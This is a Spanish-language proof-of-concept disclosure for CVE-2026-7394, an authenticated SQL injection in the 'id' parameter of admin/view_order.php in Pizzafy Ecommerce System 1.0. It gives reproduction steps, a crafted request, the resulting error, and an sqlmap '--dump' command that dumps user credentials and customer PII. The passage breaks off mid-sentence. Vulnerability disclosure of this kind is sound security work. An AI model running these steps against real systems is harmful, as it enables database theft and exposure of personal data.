
Exploit de prueba de concepto para CVE-2026-7394, una vulnerabilidad de inyección SQL en SourceCodester Pizzafy Ecommerce System 1.0. Demuestra inyección SQL de administrador autenticado a través del parámetro `id` en `admin/view_order.php`, lo que permite el volcado completo de la base de datos, incluidas las credenciales de usuario y la información personal identificable (PII).
admin/view_order.php| Campo | Valor |
|---|---|
| Proveedor | SourceCodester |
| Producto | Pizzafy Ecommerce System desarrollado con PHP y MySQL |
| Versión | 1.0 |
| Vulnerabilidad | Inyección SQL |
| CWE | CWE-89 |
| Puntuación CVSSv3 | 7.2 (Alta) |
| Vector de ataque | Red |
| Autenticación requerida | Sí (Administrador) |
| Investigador | Xmyronn |
| Fecha | 2026-04-11 |
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
Archivo: Pizzafy/admin/view_order.php
Parámetro: id (GET)
El endpoint admin/view_order.php de Pizzafy Ecommerce System 1.0 no sanea correctamente el parámetro GET id antes de pasarlo a una consulta MySQL. Un administrador autenticado puede manipular este parámetro para inyectar SQL arbitrario, lo que conduce al compromiso total de la base de datos.
Navegue a:
http://localhost/pizzafy/Pizzafy/admin/index.php
Inicie sesión con las credenciales de administrador.
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Haga clic en View Order en cualquier entrada de pedido.

La solicitud GET interceptada se ve así:

Cambie id=1 por id=':

GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
Respuesta — error de MySQL expuesto:
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
Guarde la solicitud en view_order.txt y ejecute:
sqlmap -r view_order.txt --dump --batch
sqlmap confirmó los tipos de inyección:
| Tipo | Título |
|---|---|
| Boolean-based blind | AND boolean-based blind — WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query — 11 columns |
Se volcó la base de datos completa:
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
Los datos sensibles expuestos incluyen hashes de contraseñas bcrypt, correos electrónicos de clientes, detalles de pedidos y la configuración del sistema.
Un administrador autenticado malintencionado (o un atacante que haya obtenido credenciales de administrador) puede: